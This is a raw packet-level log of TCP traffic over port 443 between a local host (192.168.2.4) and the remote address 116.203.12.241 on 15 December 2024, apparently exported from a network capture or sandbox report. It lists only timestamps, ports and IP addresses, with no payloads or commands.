Dec 15, 2024 20:48:09.162822008 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.162944078 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.163064957 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.163170099 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.163188934 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.163300037 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.163331985 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.164062023 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.164099932 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.164187908 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.164252996 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.164290905 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.164386988 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.164482117 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.164568901 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.164622068 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.164657116 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.164738894 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.164841890 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.164926052 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.165194988 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.165302992 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.165410042 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.165481091 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.165527105 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.165644884 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.165699959 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.165747881 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.165851116 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.165882111 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.207415104 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.207530975 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.251425982 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.280446053 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.280684948 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.280725956 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.280829906 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.280850887 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.280868053 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.280906916 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.281009912 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.281070948 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.281111956 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.281209946 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.281238079 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.283214092 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.283257008 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.283359051 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.283412933 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.283452034 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.283529043 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.283627033 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.283718109 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.284106970 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.284193039 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.284216881 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.284303904 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.285470009 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.285564899 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.285624027 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.285717010 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.285821915 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.285871029 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.285893917 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.285927057 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.285939932 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.285965919 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.286187887 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.286298990 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.287210941 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.287305117 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.287410975 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.287497997 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.287569046 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.287645102 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.287667036 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.287775040 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.287852049 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.287903070 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.288002014 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.331330061 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.331456900 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.375340939 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.396048069 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.396389961 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.396434069 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.397020102 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.397063017 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.405599117 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.405771971 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.405934095 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.405986071 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.406016111 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.406039000 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.406059980 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.406095028 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.406133890 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.406198025 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.406202078 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.406223059 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.406250000 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.406263113 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.406308889 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.406335115 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.406349897 CET	443	49791	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.406408072 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.406426907 CET	49791	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.406438112 CET	443	49791	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.406445026 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.406454086 CET	443	49791	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.406478882 CET	49791	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.406487942 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.406510115 CET	49791	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.406510115 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.406589985 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.407218933 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.407392025 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.407430887 CET	49791	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.407444954 CET	443	49791	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.407502890 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.407548904 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.407582998 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.407677889 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.407761097 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.407807112 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.407912970 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.408004045 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.408045053 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.408068895 CET	49803	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.408113003 CET	443	49803	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.408119917 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.408144951 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.408148050 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.408178091 CET	49803	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.408443928 CET	49803	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.408463955 CET	443	49803	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.409514904 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.409557104 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.409683943 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.409785032 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.409887075 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.409913063 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.410021067 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.410089970 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.410126925 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.410216093 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.410243034 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.410686016 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.410774946 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.410793066 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.410880089 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.410881996 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.410936117 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.411197901 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.411279917 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.411583900 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.411683083 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.411706924 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.411775112 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.411859035 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.411906004 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.411942005 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.412033081 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.412055969 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.412132025 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.412149906 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.412245035 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.412307024 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.412400961 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.412417889 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.412462950 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.412517071 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.412555933 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.412575006 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.427186966 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.427268982 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.427401066 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.427442074 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.427488089 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.427545071 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.427707911 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.427736998 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.434164047 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.434330940 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.434406042 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.434451103 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.434489965 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.434544086 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.434556007 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.434556007 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.434638977 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.448091030 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.448263884 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.448308945 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.448362112 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.448383093 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.448427916 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.448481083 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.448523045 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.448756933 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.448801994 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.448908091 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.495343924 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.495554924 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.519330978 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.519366980 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.519486904 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.519527912 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.519644022 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.519673109 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.519701958 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.519810915 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.532793045 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.532854080 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.532919884 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.532955885 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.532959938 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.532984018 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.533107042 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.533127069 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.533149958 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.533163071 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.533178091 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.533210993 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.533232927 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.533246040 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.533263922 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.533302069 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.533318043 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.534420967 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.534503937 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.534535885 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.534634113 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.534657001 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.534744024 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.534766912 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.534881115 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.537072897 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.537175894 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.537189007 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.537240982 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.537280083 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.537305117 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.537316084 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.537328959 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.537395954 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.537417889 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.537417889 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.537424088 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.537447929 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.540266037 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.540369034 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.540402889 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.540518999 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.540565968 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.540574074 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.540693045 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.540728092 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.542884111 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.542943954 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.542960882 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.543003082 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.543018103 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.543039083 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.543061018 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.543100119 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.543126106 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.543143988 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.543153048 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.543220043 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.546479940 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.546689034 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.546739101 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.546879053 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.546967030 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.547055006 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.547075987 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.547168016 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.549853086 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.549964905 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.550074100 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.550180912 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.550225019 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.550340891 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.550381899 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.550457954 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.550487041 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.550609112 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.550725937 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.555203915 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.555344105 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.555438042 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.555557013 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.555655003 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.555737019 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.555829048 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.555870056 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.555912018 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.555922031 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.555999041 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.556021929 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.568198919 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.568315029 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.568533897 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.568593025 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.568644047 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.568886995 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.568947077 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.569066048 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.615379095 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.655221939 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.655409098 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.655483007 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.655657053 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.655921936 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.661700010 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.661797047 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.661813974 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.661873102 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.661906004 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.661941051 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.661973000 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.662009954 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.662091017 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.662224054 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.662270069 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.662360907 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.662447929 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.662492990 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.662575960 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.662595034 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.667546988 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.667581081 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.667723894 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.667824984 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.667870045 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.667973042 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.668036938 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.668175936 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.668293953 CET	49797	443	192.168.2.4	116.203.12.241
